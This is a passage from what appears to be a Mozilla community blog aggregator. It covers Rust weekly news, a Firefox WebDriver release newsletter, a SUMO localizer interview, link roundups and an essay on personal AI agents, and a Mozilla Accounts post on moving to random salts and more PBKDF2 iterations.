  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

447 pull requests were merged in the last week

Rust Compiler Performance Triage

This week saw a lot of activity both on the regressions and improvements side. There was one large regression, which was immediately reverted. Overall, the week ended up being positive, thanks to a rollup PR that caused a tiny improvement to almost all benchmarks.

Triage done by @kobzol. Revision range: 3e33bda0..c8a8c820

Summary:

(instructions:u) mean range count
Regressions ❌ (primary) 0.7% [0.2%, 2.7%] 15
Regressions ❌ (secondary) 0.8% [0.1%, 1.6%] 22
Improvements ✅ (primary) -0.6% [-1.5%, -0.2%] 153
Improvements ✅ (secondary) -0.7% [-1.9%, -0.1%] 80
All ❌✅ (primary) -0.5% [-1.5%, 2.7%] 168

6 Regressions, 6 Improvements, 4 Mixed; 6 of them in rollups. 58 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-30 - 2024-11-27 🦀

Virtual
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

An earnest effort to pursue [P1179R1] as a Lifetime TS[P3465R0] will compromise on C++’s outdated and unworkable core principles and adopt mechanisms more like Rust’s. In the compiler business this is called carcinization: a tendency of non-crab organisms to evolve crab-like features. – Sean Baxter on circle-lang.org

Thanks to Collin Richards for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Firefox Developer ExperienceFirefox WebDriver Newsletter 132

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 132 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

We are always grateful to receive external contributions, here are the ones which made it in Firefox 132:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi.

WebDriver BiDi

Retry commands to avoid AbortError failures

In release 132, one of our primary focus areas was enhancing the reliability of command execution.

Internally, we sometimes need to forward commands to content processes. This can easily fail, particularly when targeting a page which was either newly created or in the middle of a navigation. These failures often result in errors such as "AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved".

<- {
  "type":"error",
  "id":14,
  "error":"unknown error",
  "message":"AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved",
  "stacktrace":""
}

While there are valid technical reasons that prevent command execution in some cases, there are also many instances where retrying the command is a feasible solution.

The browsingContext.setViewport command was specifically updated in order to retry an internal command, as it was frequently failing. Then we updated our overall implementation in order to retry commands automatically if we detect that the page is navigating or about to navigate. Note that retrying commands is not entirely new, it’s an internal feature we were already using in a few handpicked commands. The changes in Firefox 132 just made its usage much more prevalent.
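
Conceptually, the retry logic amounts to something like the following sketch. This is not the actual Firefox MessageHandler code, just the general pattern of retrying a command whose target actor was destroyed mid-navigation.

// Retry a command a few times if it fails with an AbortError.
async function sendCommandWithRetry(sendCommand, maxRetries = 3) {
  for (let attempt = 0; ; attempt++) {
    try {
      return await sendCommand();
    } catch (e) {
      if (e.name !== "AbortError" || attempt >= maxRetries) {
        throw e;
      }
      // The content process went away (e.g. a navigation happened); try again.
    }
  }
}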

New preference: remote.retry-on-abort

To go one step further, we decided to allow all commands to be retried by default when the remote.retry-on-abort preference is set to true. Note that true is the default value, which means that with Firefox 132, all commands which need to reach the content process might now be retried (documentation). If you were previously relying on or working around the aforementioned AbortError, and notice an unexpected issue with Firefox 132, you can update this preference to make the behavior closer to previous Firefox versions. Please also file a Bug to let us know about the problem.
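
If you do rely on the old behavior, the preference can be flipped in about:config or set when starting the browser from automation. For example, with the selenium-webdriver package for Node.js (a sketch; the preference name is the one documented above, the rest is just one way of passing a profile preference):

const { Builder } = require("selenium-webdriver");
const firefox = require("selenium-webdriver/firefox");

async function makeDriver() {
  // Disable automatic retries to get behavior closer to Firefox 131 and earlier.
  const options = new firefox.Options().setPreference("remote.retry-on-abort", false);
  return new Builder().forBrowser("firefox").setFirefoxOptions(options).build();
}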

Bug fixes

Support.Mozilla.OrgContributor spotlight – Michele Rodaro

Hi Mozillians,

In today’s edition, I’d like to introduce you all to Michele Rodaro, a locale leader for Italian on the Mozilla Support platform. He is a professional architect, but he has found pleasure and meaning in contributing to Mozilla since 2006. I’ve met him on several occasions in the past, and reading his answers feels exactly like talking to him in real life. I’m sure you can sense his warmth and kindness just by reading his responses. Here’s a beautiful analogy from Michele about his contributions to Mozilla as they relate to his background in architecture:

I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority.

Q: Hi Michele, can you tell us more about yourself and what keeps you busy these days?

I live in Gemona del Friuli, a small town in the Friuli Venezia Giulia region, in the north-east of Italy, bordering Austria and Slovenia. I am a freelance architect, having graduated from Venice’s University many years ago. I own a professional studio and I mainly deal with residential planning, renovations, and design. In my free time I like to draw, read history, art, literature, satire and comics, listen to music, take care of my cats and, of course, translate or update SUMO Knowledge Base articles into Italian.

When I was younger, I played many sports (skiing, basketball, rugby, and athletics). When I can, I continue to go skiing in the beautiful mountains of my region. Oh, I also played piano in a jazz rock band I co-founded in the late 70s and early 80s (good times). In this period, from a professional point of view, I am trying to survive the absurd bureaucracy that is increasingly oppressive in my working environment. As for SUMO, I am maintaining the Italian KB at 100% of the translations, and supporting new localizers to help them align with our translation style.

Q: You got started with the Italian local forum in 2006 before expanding your contribution to SUMO in 2008. Can you tell us more about the different types of contributions that you’re doing for Mozilla?

I found out about Firefox in November 2005 and discovered the Mozilla Italia community and their support forum. Initially, I used the forum to ask for help from other volunteers and, after a short time, I found myself personally involved in providing online assistance to Italian users in need. Then I became a moderator of the forum and in 2008, with the help of my friend @Underpass, I started contributing to the localization of SUMO KB articles (the KB was born in that year). It all started like that.

Today, I am an Italian locale leader in SUMO. I take care of the localization of KB articles and train new Italian localizers. I continue to provide support to users on the Italian forums and when I manage to solve a problem I am really happy, but my priority is the SUMO KB because it is an essential source to help users who search online for an immediate solution to any problem encountered with Firefox on all platforms and devices or with Thunderbird, and want to learn the various features of Mozilla applications and services. Forum support has also benefited greatly from KB articles because, instead of having to write down all the procedures to solve a user’s problem every time, we can simply provide them with the link to the article that could solve the problem without having to write the same things every time, especially when the topic has already been discussed many times, but users have not searched our forum.

Q: In addition to translating articles on SUMO, you’re also involved in product translation on Pontoon. With your experience across both platforms, what do you think SUMO can learn from Pontoon, and how can we improve our overall localization process?

I honestly don’t know, they are quite different ways of doing things in terms of using translation tools specifically. I started collaborating with Pontoon’s Italian l10n team in 2014… Time flies… The rules, the style guides, and the QA process adopted for the Italian translations on Pontoon are the same ones we adopted for SUMO. I have to say that I am much more comfortable with SUMO’s localization process and tool, maybe because I have seen it start off, grow and evolve over time. Pontoon introduced Pretranslation, which helps a lot in translating strings, although it still needs improvements. A machine translation of strings that are not already in Pontoon’s “Translation Memory” is proposed. Sometimes that works fine, other times we need to correct the proposal and save it after escalating it on GitHub, so that in the future that translation becomes part of the “Translation Memory”. If the translation of a string is not accurate, it can be changed at any time.

I don’t know if it can be a solution for some parts of SUMO articles. We already have templates, maybe we should further implement the creation and use of templates, focusing on this tool, to avoid typing the translation of procedures/steps that are repeated identically in many articles.

Q: What are the biggest challenges you’re currently facing as a SUMO contributor? Are there any specific technical issues you think should be prioritized for fixing?

Being able to better train potential new localizers, and help infuse the same level of passion that I have in managing the Italian KB of SUMO. As for technical issues, staying within the scope of translating support articles, I do not encounter major problems in terms of translating and updating articles, but perhaps it is because I now know the strengths and weaknesses of the platform’s tools and I know how to manage them.

Maybe we could find a way to remedy what is usually the most frustrating thing for a contributor/localizer who, for example, is updating an article directly online: the loss of their changes after clicking the “Preview Content” button. That is when you click on the “Preview Content” button after having translated an article to correct any formatting/typing errors. If you accidentally click a link in the preview and don’t right-click the link to select “Open Link in New Tab” from the context menu, the link page opens replacing/overwriting the editing page and if you try to go back everything you’ve edited/translated in the input field is gone forever… And you have to start over. A nightmare that happened to me more than once often because I was in a hurry. I used to rely on a very good extension that saved all the texts I typed in the input fields and that I could recover whenever I wanted, but it is no longer updated for the newer versions of Firefox. I’ve tried others, but they don’t convince me. So, in my opinion, there should be a way to avoid this issue without installing extensions. I’m not a developer, I don’t know if it’s easy to find a solution, but we have Mozilla developers who are great ;)

Maybe there could be a way to automatically save a draft of the edit every “x” seconds to recover it in case of errors with the article management. Sometimes, even the “Preview Content” button could be dangerous. If you accidentally lost your Internet connection and didn’t notice, if you click on that button, the preview is not generated, you lose everything and goodbye products!

Q: Your background as a freelance architect is fascinating! Could you tell us more about that? Do you see any connections between your architectural work and your contribution to Mozilla, or do you view them as completely separate aspects of your life?

As an architect I can only speak from my personal experience, because I live in a small town, in a beautiful region which presents me with very different realities than those colleagues have to deal with in big cities like Rome or Milan. Here everything is quieter, less frenetic, which is sometimes a good thing, but not always. The needs of those who commission a project are different if you have to carry it out in a big city, the goal is the same but, urban planning, local building regulations, available spaces in terms of square footage, market requests/needs, greatly influence the way an architect works. Professionally I have had many wonderful experiences in terms of design and creativity (houses, residential buildings, hotels, renovations of old rural or mountain buildings, etc.), challenges in which you often had to play with just a centimeter of margin to actually realize your project.

Connection between architecture and contribution to Mozilla? Good question. I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority. If someone wants our “cookies” and unfortunately often not only those, they have to knock, ask permission and if we do not want to have intrusive guests, that someone has to turn around, go away and let us do our things without sticking their nose in. This is my idea of ​​Mozilla, this is the reason that pushed me to believe in its values ​​(The user and his privacy first) and to contribute as a volunteer, and this is what I would like to continue to believe even if someone might say that I am naive, that “they are all the same”.

My duty as an architect is like that of a good parent, when necessary I must always warn my clients about why I would advise against certain solutions that I, from professional experience, already know are difficult to implement or that could lead to future management and functionality problems. In any case I always look for solutions that can satisfy my clients’ desires. Design magazines are beautiful, but it is not always possible to reproduce a furnishing solution in living environments that are completely different from the spaces of a showroom set up to perfection for a photo shoot… Mozilla must continue to do what it has always done, educate and protect users, even those who do not use its browser or its products, from those “design magazines” that could lead them to inadvertently make bad choices that they could regret one day.

Q: Can you tell us more about the Italian locale team in SUMO and how do you collaborate with each other?

First of all, it’s a fantastic team! Everyone does what they do best, there are those who help users in need on the forums, those who translate, those who check the translations and do QA by reporting things that need to be corrected or changed, from punctuation errors to lack of fluency or clarity in the translation, those who help with images for articles because often the translator needs the specific image for an operating system that he does not have.

As for translations, which is my main activity, we usually work together with 4- 5 collaborators/friends, and we use a consolidated procedure. Translation of an article, opening a specific discussion for the article in the forum section dedicated to translations with the link of the first translation and the request for QA. Intervention of anyone who wants to report/suggest a correction or a change to be made, modification, link to the new revised version based on the suggestions, rereading and if everything is ok, approval and publication. The translation section is public — like all the other sections of the Mozilla Italia forum — and anyone can participate in the discussion.

We are all friends, volunteers, some of us know each other only virtually, others have had the chance to meet in person. The atmosphere is really pleasant and even when a discussion goes on too long, we find a way to lighten the mood with a joke or a tease. No one acts as the professor, we all learn something new. Obviously, there are those like me who are more familiar with the syntax/markup and the tools of the SUMO Wiki and those who are less, but this is absolutely not a problem to achieve the final result which is to provide a valid guide to users.

Q: Looking back on your contribution to SUMO, what was the most memorable experience for you? Anything that you’re most proud of?

It’s hard to say… I’m not a tech geek, I don’t deal with code, scripts or computer language so my contribution is limited to translating everything that can be useful to Italian users of Mozilla products/programs. So I would say: the first time I reached the 100% translation percentage of all the articles in the Italian dashboard. I have always been very active and available over the years with the various Content Managers of SUMO. When I received their requests for collaboration, I did tests, opened bugs related to the platform, and contributed to the developers’ requests by testing the procedures to solve those bugs.

As for the relationship with the Mozilla community, the most memorable experience was undoubtedly my participation in the Europe MozCamp 2009 in Prague, my “first time”, my first meeting with so many people who then became dear friends, not only in the virtual world. I remember being very excited about that invitation and fearful for my English, which was and is certainly not the best. An episode: Prague, the first Mozilla talk I attended. I was trying to understand as much as possible what the speaker was saying in English. I heard this strange word “eltenen… eltenen… eltenen” repeated several times. What did it mean? After a while I couldn’t take it anymore, I turned to an Italian friend who was more expert in the topics discussed and above all who knew the English language well. Q: What the hell does “eltenen” mean? A: “Localization”. Q: “Localization???” A: “l10n… L ten n… L ocalizatio n”. Silence, embarrassment, damn acronyms!

How could I forget my first trip outside of Europe to attend the Mozilla Summit in Whistler, Canada in the summer of 2010? It was awesome, I was much more relaxed, decided not to think about the English language barrier and was able to really contribute to the discussions that we, SUMO localizers and contributors from so many countries around the world, were having to talk about our experience, try to fix the translation platform to make it better for us and discuss all the potential issues that Firefox was having at the time. I really talked a lot and I think the “Mozillians” I interacted with even managed to understand what I was saying in English :)

The subsequent meetings, the other All Hands I attended, were all a great source of enthusiasm and energy! I met some really amazing people!

Q: Lastly, can you share tips for those who are interested in contributing to Italian content localization or contributing to SUMO in general?

Every time a new localizer starts collaborating with us I don’t forget all the help I received years ago! I bend over backwards to put them at ease, to guide them in their first steps and to be able to transmit to them the same passion that was transmitted to me by those who had to review with infinite patience my first efforts as a localizer. So I would say: first of all, you must have passion and a desire to help people. If you came to us it’s probably because you believe in this project, in this way of helping people. You can know the language you are translating from very well, but if you are not driven by enthusiasm everything becomes more difficult and boring. Don’t be afraid to make mistakes, if you don’t understand something ask, you’re among friends, among traveling companions. As long as an article is not published we can correct it whenever we want and even after publication. We were all beginners once and we are all here to learn. Take an article, start translating it and above all keep it updated.

If you are helping on the support forums, be kind and remember that many users are looking for help with a problem and often their problems are frustrating. The best thing to do is to help the user find the answer they are looking for. If a user is rude, don’t start a battle that is already lost. You are not obligated to respond, let the moderators intervene. It is not a question of wanting to be right at all costs but of common sense.

 

Don Martilinks for 29 Oct 2024

Satire Without Purpose Will Wander In Dark Places Broadly labelling the entirety of Warhammer 40,000 as satire is no longer sufficient to address what the game has become in the almost 40 years since its inception. It also fails to answer the rather awkward question of why, exactly, these fascists who are allegedly too stupid to understand satire are continually showing up in your satirical community in the first place.

Why I’m staying with Firefox for now – Michael Kjörling [T]he most reasonable option is to keep using Firefox, despite the flaws of the organization behind it. So far, at least these things can be disabled through settings (for example, their privacy-preserving ad measurement), and those settings can be prepared in advance.

Google accused of shadow campaigns redirecting antitrust scrutiny to Microsoft, Google’s Shadow Campaigns (so wait a minute, Microsoft won’t let companies use their existing Microsoft Windows licenses for VMs in the Google cloud, and Google is doing a sneaky advocacy campaign? Sounds like content marketing for Amazon Linux®)

Scripting News My friends at Automattic showed me how to turn on ActivityPub on a WordPress site. I wrote a test post in my simple WordPress editor, forgetting that it would be cross-posted to Mastodon. When I just checked in on Masto, there was the freaking post. After I recovered from passing out, I wondered what happens if I update the post in my editor, and save it to the WordPress site that’s hooked up to Masto via ActivityPub. So I made a change and saved it. I waited and waited, nothing happened. I got ready to add a comment saying ahh I guess it doesn’t update, when—it updated. (Like being happy when a new web site opens in a new browser, a good sign that ActivityPub is the connecting point for this kind of connected innovation.) Related: The Web Is a Customer Service Medium (Ftrain.com) by Paul Ford.

China Telecom’s next 150,000 servers will mostly use local processors Among China Telecom’s server buys this year are machines running processors from local champion Loongson, which has developed an architecture that blends elements of RISC-V and MIPS.

Removal of Russian coders spurs debate about Linux kernel’s politics Employees of companies on the Treasury Department’s Office of Foreign Assets Control list of Specially Designated Nationals and Blocked Persons (OFAC SDN), or connected to them, will have their collaborations subject to restrictions, and cannot be in the MAINTAINERS file.

The TikTokification of Social Media May Finally Be Its Undoing by Julia Angwin. If tech platforms are actively shaping our experiences, after all, maybe they should be held liable for creating experiences that damage our bodies, our children, our communities and our democracy.

Cheap Solar Panels Are Changing the World The latest global report from the International Energy Agency (IEA) notes that solar is on track to overtake all other forms of energy by 2033.

Conceptual models of space colonization - Charlie’s Diary (one more: Kurt Vonnegut’s concept for spreading genetic material)

(protip: you can always close your browser tabs with creepy tech news, there will be more in a few minutes… Location tracking of phones is out of control. Here’s how to fight back. LinkedIn fined $335 million in EU for tracking ads privacy breaches Pinterest faces EU privacy complaint over tracking ads Dems want tax prep firms charged for improper data sharing Dow Jones says Perplexity is “freeriding,” sues over copyright infringement You Have a ‘Work Number’ on This Site, and You Should Freeze It Roblox stock falls after Hindenburg blasts the social gaming platform over bots and pedophiles)

It Was Ten Years Ago Today that David Rosenthal predicted that cryptocurrency networks will be dominated by a few, perhaps just one, large participant.

Writing Projects (good start for a checklist before turning in a writing project. Maybe I should write Git hooks for these.)

Word.(s). (Includes some good vintage car ads. Remember when most car ads were about the car, not just buttering up the driver with how successful you must be to afford this thing?)

Social Distance and the Patent System [I]t was clear from our conversation that [Judge Paul] Michel doesn’t have a very deep understanding of the concerns of many in the software industry. And, more to the point, he clearly wasn’t very interested in understanding those concerns better or addressing them. On a theoretical level, he knew that there was a lot of litigation in the software industry and that a lot of people were upset about it. But like Fed and the unemployment rate, this kind of theoretical knowledge doesn’t always create a sense of urgency. One has to imagine that if people close to Michel—say, a son who was trying to start a software company—were regularly getting hit by frivolous patent lawsuits, he would suddenly take the issue more seriously. But successful software entrepreneurs are a small fraction of the population, and most likely no judges of the Federal Circuit have close relationships with one.

(Rapids is the script that gathers these, and it got a clean bill of health from the feed reader score report after I fixed the Last-Modified/If-Modified-Since and Etag handling. So expect more link dump posts here, I guess.)

Wil ClouserMozilla Accounts password hashing upgrades

We’ve recently finished two significant changes to how Mozilla Accounts handles password hashes which will improve security and increase flexibility around changing emails. The changes are entirely transparent to end-users and are applied automatically when someone logs in.

Randomizing Salts

If a system is going to store passwords, best practice is to hash the password with a unique salt per row. When accounts was first built we used an account’s email address as the unique salt for password hashing. This saved a column in the database and some bandwidth, but overall I think it was a poor idea. It meant people couldn’t re-use their email addresses and it left PII sitting around unnecessarily.

Instead, a better idea is just to generate a random salt. We’ve now transitioned Mozilla Accounts to random salts.
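
As a rough illustration of the approach (this is not Mozilla Accounts’ actual code; the field names and the iteration constant are placeholders), a per-row random salt is generated once, stored next to the hash, and used again at verification time:

```python
import hashlib
import secrets

ITERATIONS = 650_000  # key stretching, discussed in the next section

def hash_password(password: str) -> dict:
    """Hash a password with a unique random salt instead of reusing the email address."""
    salt = secrets.token_bytes(16)  # per-row random salt; unique, but not secret
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return {"salt": salt.hex(), "hash": digest.hex()}

def verify_password(password: str, record: dict) -> bool:
    """Re-derive the hash with the stored salt and compare in constant time."""
    salt = bytes.fromhex(record["salt"])
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return secrets.compare_digest(digest.hex(), record["hash"])
```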

Increasing Key Stretching Iterations

Eight years ago Ryan Kelly filed bug 1320222 to review Mozilla Accounts’ client-side key stretching capabilities and sparked a spirited conversation about iterations and the priority of the bug. Overall, this is routine maintenance: we expect any amount of stretching we do will have to be revisited periodically as hardware improves, and the value we choose is a compromise between security and time to log in, particularly on older hardware.

Since we were generating new hashes for the random salts already, we took the opportunity to increase our PBKDF2 iterations from 1,000 to 650,000 – a number we’re seeing others in the industry using. This means logging in with slower hardware (like older mobile phones) may be noticeably slower. Below is an excerpt from the analysis we did, showing that a MacBook from 2007 will take an additional ~3 seconds to log in:

Key Stretch Iterations | Overhead on 2007 MacBook | Overhead on 2021 MacBook Pro M1
100,000 | 0.4800024 seconds | 0.00000681 seconds
200,000 | 0.9581234 seconds | 0.00000169 seconds
300,000 | 1.4539928 seconds | 0.00000277 seconds
400,000 | 1.9337903 seconds | 0.00029750 seconds
500,000 | 2.4146366 seconds | 0.00079127 seconds
600,000 | 2.9482827 seconds | 0.00112186 seconds
700,000 | 3.3960513 seconds | 0.00117956 seconds
800,000 | 3.8675677 seconds | 0.00117956 seconds
900,000 | 4.3614942 seconds | 0.00141616 seconds
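
If you want a rough sense of the equivalent overhead on your own hardware, a quick benchmark along the lines of the analysis above might look like this (illustrative only; the absolute numbers depend entirely on the machine and the PBKDF2 implementation):

```python
import hashlib
import os
import time

password = b"correct horse battery staple"
salt = os.urandom(16)

# Time one PBKDF2-SHA256 derivation at each iteration count from the table above.
for iterations in range(100_000, 1_000_000, 100_000):
    start = time.perf_counter()
    hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    elapsed = time.perf_counter() - start
    print(f"{iterations:>7,} iterations: {elapsed:.3f} seconds")
```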

Implementation

Dan Schomburg did the heavy lifting to make this a smooth and successful project. He built the v2 system alongside v1 so that both hashes are generated simultaneously, and if a v2 hash exists the login system will use it. This lets us roll the feature out slowly and gives us control if we need to disable it or roll back.

We tested the code for several months on our staging server before rolling it out in production. When we did enable it in production it was over the course of several weeks via small percentages while we watched for unintended side-effects and bug reports.

I’m pleased to say everything appears to be working smoothly. As always, if you notice any issues please let us know.

Don Martitypefaces that aren’t on this blog (yet?)

Right now I’m not using these, but they look useful and/or fun.

  • Departure Mono: vintage-looking, pixelated, lo-fi technical vibe.

  • Atkinson Hyperlegible Font was carefully developed by the Braille Institute to help low-vision readers. It improves legibility and readability through clear and distinctive letters and numbers.

I’m trying to keep this site fairly small and fast, so I’m getting by with Modern Font Stacks as much as possible.

Related

colophon

Bonus links

(these are all web development, editing, and business, more or less. Yes, I’m still working on my SCALE proposal, deadline coming up.)

Before you buy a domain name, first check to see if it’s haunted

Discover Wiped Out MFA Spend By Following These Four Basic Steps (This headline underrates the content. If all web advertisers followed these tips, then 90% of the evil stuff on the Internet would be gone—most of the web’s problems are funded by advertisers and agencies who fail to pay attention to the context in which their ads appear.)

Janky remote backups without root on the far end

My solar-powered and self-hosted website

Let’s bring back browsing

Hell Gate NYC doubled its subscription revenue in its second year as a worker-owned news outlet

Is Matt Mullenweg defending WordPress or sabotaging it?

Gosub – An open-source browser engine

Take that

Thunderbird Android client is K-9 Mail reborn, and it’s in solid beta

A Bicycle for the Mind – Prologue

Why I Migrated My Newsletter From Substack to Eleventy and Buttondown - Richard MacManus

My Blog Engine is the Erlang Build Tool

A Developer’s Guide to ActivityPub and the Fediverse

Don Martipersonal AI in the rugpull economy

Doc Searls writes, in Personal Agentic AI,

Wouldn’t it be good for corporate AI agents to have customer hands to shake that are also equipped with agentic AI? Wouldn’t those customers be better than ones whose agency is merely human, and limited to only what corporate AI agents allow?

The obvious answer for business decision-makers today is: lol, no, a locked-in customer is worth more. If, as a person who likes to watch TV, you had an AI agent, then the agent could keep track of sports seasons and the availability of movies and TV shows, and turn your streaming subscriptions on and off. In the streaming business, like many others, the management consensus is to make things as hard and manual as possible on the customer side, and save the automation for the company side. Just keeping up with watching a National Football League team is hard…even for someone who is ON the team. Automation asymmetry, where the seller gets to reduce service costs while the customer has to do more and more manual work, is seen as a big win by the decision-makers on the high-automation side.

Big company decision-makers don’t want to let smaller companies have their own agentic tools, either. Getting a DMCA Exemption to let McDonald’s franchisees fix their ice cream machines was a big deal that required a lengthy process with the US Copyright Office. Many other small businesses are locked in to the manual, low-information side of a business relationship with a larger one. (Web advertising is another example. Google shoots at everyone’s feet, and agencies, smaller firms, and browser extension developers dance.) Google employees and shareholders would be better off if it were split into two companies that could focus on useful projects for independent customers who had real choices.

The first wave of user reactions to AI is happening, and it’s adversarial. Artists on sites like DeviantArt went first, and now Reddit users are deliberately posting fake answers to feed Google’s AI. On the shopping side, avoiding the output of AI and made-for-AI deceptive crap is becoming a must-have mainstream skill, as covered in How to find helpful content in a sea of made-for-Google BS and How Apple and Microsoft’s trusted brands are being used to scam you. As Baldur Bjarnason writes,

The public has for a while now switched to using AI as a negative—using the term artificial much as you do with artificial flavouring or that smile’s artificial. It’s insincere creativity or deceptive intelligence.

Other news is even worse. In today’s global conflict between evil oligarchs and everyone else, AI is firmly aligned with the evil oligarch side.

But today’s Big AI situation won’t last. Small-scale and underground AI has sustainable advantages over the huge but money-losing contenders. And it sounds like Doc is already thinking post-bubble.

Adversarial now, but what about later?

So how do we get from the AI adversarial situation we have now to the win-win that Doc is looking for? Part of the answer will be resolving the legal issues. Today’s Napster-like free-for-all environment won’t persist, so eventually we will have an AI scene in which companies that want to use your work for training have to get permission and disclose provenance.

The other part of the path from today’s situation—where big companies have AI that enables scam culture and chickenization while individuals and small companies are stuck rowing through funnels and pipelines—is personal, aligned AI that balances automation asymmetries. Whether it’s solving CAPTCHAs, getting data in hard-to-parse formats, or other awkward mazes, automation asymmetries mean that as a customer, you technically have more optionality than you practically have time to use. But AI has a lot more time. If a company gives you user experience grief, with the right tools you can get back to where you would have been if they had applied less obfuscation in the first place. (icymi: Video scraping: extracting JSON data from a 35 second screen capture for less than 1/10th of a cent. Not a deliberate obfuscation example, but an approach that can be applied.)

So we’re going to see something like this AI cartoon by Tom Fishburne (thanks to Doc for the link) for privacy labour. Companies are already getting expensive software-as-a-service to make privacy tasks harder for the customers, which means that customers are going to get AI services to make it easier. Eventually some companies will notice the extra layers, pay attention to the research, and get rid of the excess grief on their end so you can stop running de-obfuscation on your end. That will make it work better for everyone. (GPC all the things! Data Rights Protocol)

The biggest win from personal AI will, strangely enough, be in de-personalizing your personal information environment. By doing the privacy labour for you, the agentic AI will limit your addressability and reduce personalization risks. The risks to me from buying the less suitable of two legit brands are much lower than the risk of getting stuck with some awful crap that was personalized to me and not picked up on by norms enforcers like Consumer Reports. Getting more of my privacy labour done for me will not just help me personally do better #mindfulConsumption, but also increase the rewards for win-win moves by sellers. Personalization might be nifty, but filtering out crap and rip-offs is a bigger immediate win (Sunday Internet optimism). Doc writes, When you limit what customers can bring to markets, you limit what can happen in those markets. As far as I can tell, the real promise for agentic AI isn’t just in enabling existing processes or making them more efficient. It’s in establishing a credible deterrent to enshittification—if you’re trying to rip me off, don’t talk to me, talk to my bot army.

For just a minute, put yourself in the shoes of a product manager with a proposal for some legit project that they’re trying to get approved. If that proposal is up against a quick win for the company, like one based on creepy surveillance, it’s going to lose. But if the customers have the automation power to lower the ROI from creepy growth hacking, the legit project has a chance. And that pushes up the long-term value of the entire company. An individual locked-in customer is more valuable to the brand than an individual independent customer, but a brand with independent customers is more valuable than a brand with an equal number of locked-in customers.

Anyway, hope to see you at VRM Day.

Bonus links

Space is Dead. Why Do We Keep Writing About It?

It’s Time to Build the Exoplanet Telescope

The tech startups shaking up construction in Europe

Support.Mozilla.OrgWhat’s up with SUMO – Q3 2024

Each quarter, we gather insights on all things SUMO to celebrate our team’s contributions and showcase the impact of our work.

The SUMO community is powered by an ever-growing global network of contributors. We are so grateful for your contributions, which help us improve our product and support experiences, and further Mozilla’s mission to make the internet a better place for everyone.

This quarter we’re modifying our update to highlight key takeaways, outline focus areas for Q4, and share our plans to optimize our tools so we can measure the impact of your contributions more effectively.

Below you’ll find our report organized by the following sections: Q3 Highlights at-a-glance, an overview of our Q4 Priorities & Focus Areas, Contributor Spotlights and Important Dates, with a summary of special events and activities to look forward to! Let’s dive right in:

Q3 Highlights at-a-glance

Forums: We saw over 13,000 questions posted to SUMO in Q3, up 83% from Q2. The increased volume was largely driven by the navigation redesign in July.

  • We were able to respond to over 6,300 forum questions, a 49% increase from Q2!
  • Our average response time was ~15 hours, which is a one-hour improvement over Q2, with a helpfulness rating of 66%.
  • August was our busiest and most productive month this year. We saw more than 4,300 questions shared in the forum, and we were able to respond to 52.7% of total in-bounds.
  • Trends in forum queries included questions about site breakages, account and data recovery concerns, sync issues, and PPA feedback.

Knowledge Base: We saw 473 en-US revisions from 45 contributors, and more than 3,000 localization revisions from 128 contributors which resulted in an overall helpfulness rating of 61%, our highest quarterly average rating YTD!

  • Our top contributor was AliceWyman. We appreciate your eagle eyes and dedication to finding opportunities to improve our resources.
  • For localization efforts, our top contributor was Michele Rodaro. We are grateful for your time, efforts and expert language skills.

Social: On our social channels, we interacted with over 1,100 tweets and saw more than 6,000 app reviews.

